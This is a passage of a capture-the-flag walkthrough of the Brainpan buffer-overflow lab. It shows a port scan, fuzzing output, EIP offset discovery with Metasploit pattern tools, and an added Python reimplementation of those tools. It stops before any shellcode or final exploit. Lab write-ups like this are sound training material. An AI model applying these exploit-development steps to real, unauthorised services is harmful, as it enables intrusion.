https://tryhackme.com/room/brainpan

Pwned Date - 30th September 2022

Vulnhub - Brainpan 1 Walkthrough - StefLan's Security Blog

STRAIGHT JUMP INTO THE BUFFER OVERFLOW

PORT      STATE SERVICE
9999/tcp  open  abyss
10000/tcp open  snet-sensor-mgmt

Navigating to http://<ip>:10000/bin gives us the brainpan.exe binary.

Running brainpan.exe (under wine) starts a listener on port 9999:

┌──(kali㉿kali)-[~]
└─$ wine brainpan.exe 
[+] initializing winsock...done.
[+] server socket created.
[+] bind done on port 9999
[+] waiting for connections.

1. Fuzzing

fuzzer.py

┌──(kali㉿kali)-[~]
└─$ python 1-fuzzer.py
Fuzzing with 100 bytes
Fuzzing with 200 bytes
Fuzzing with 300 bytes
Fuzzing with 400 bytes
Fuzzing with 500 bytes
Fuzzing with 600 bytes
Fuzzing crashed at 600 bytes


2. Finding Offset

Use msf-pattern_create with a length about 400 bytes larger than the size that crashed the service during fuzzing:

msf-pattern_create -l 1000

find-offset.py

The crash overwrites EIP with 35724134.

msf-pattern_offset -l <crashed_size> -q <EIP>
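To make clear what the two msf-pattern tools compute for the values above, here is an added Python reimplementation of the cyclic pattern and the offset lookup (this is not code from the original walkthrough nor from the Metasploit tools themselves). It generates the same "Aa0Aa1..." pattern, reverses the little-endian EIP bytes back into four pattern characters, and reports where they sit in the 1000-byte pattern; the pattern length, not the fuzzing crash size, is what the lookup has to use.

```python
import string
import struct

# Reimplementation of the msf-pattern_create scheme: every 3-byte chunk is
# (uppercase, lowercase, digit), cycling through A-Z x a-z x 0-9, so any
# 4-byte window is unique within the first 20280 bytes of the pattern.
def pattern_create(length: int) -> str:
    chunks = []
    for upper in string.ascii_uppercase:
        for lower in string.ascii_lowercase:
            for digit in string.digits:
                chunks.append(upper + lower + digit)
                if len(chunks) * 3 >= length:
                    return "".join(chunks)[:length]
    return "".join(chunks)[:length]


# Equivalent of msf-pattern_offset -l <pattern_length> -q <EIP>.
# The debugger shows EIP as a big-endian hex number, but the bytes landed in
# memory little-endian, so pack the value "<I" to recover the pattern chars.
# Returns -1 when the value does not come from the pattern at all (for
# example a non-ASCII or unrelated register value), which is the cue that the
# register was not overwritten by the input.
def pattern_offset(pattern_length: int, eip_hex: str) -> int:
    value = int(eip_hex, 16)
    try:
        needle = struct.pack("<I", value).decode("ascii")
    except UnicodeDecodeError:
        return -1
    return pattern_create(pattern_length).find(needle)


if __name__ == "__main__":
    # Values from this walkthrough: 1000-byte pattern, EIP 35724134
    print(pattern_create(30))
    print(pattern_offset(1000, "35724134"))  # → 524
```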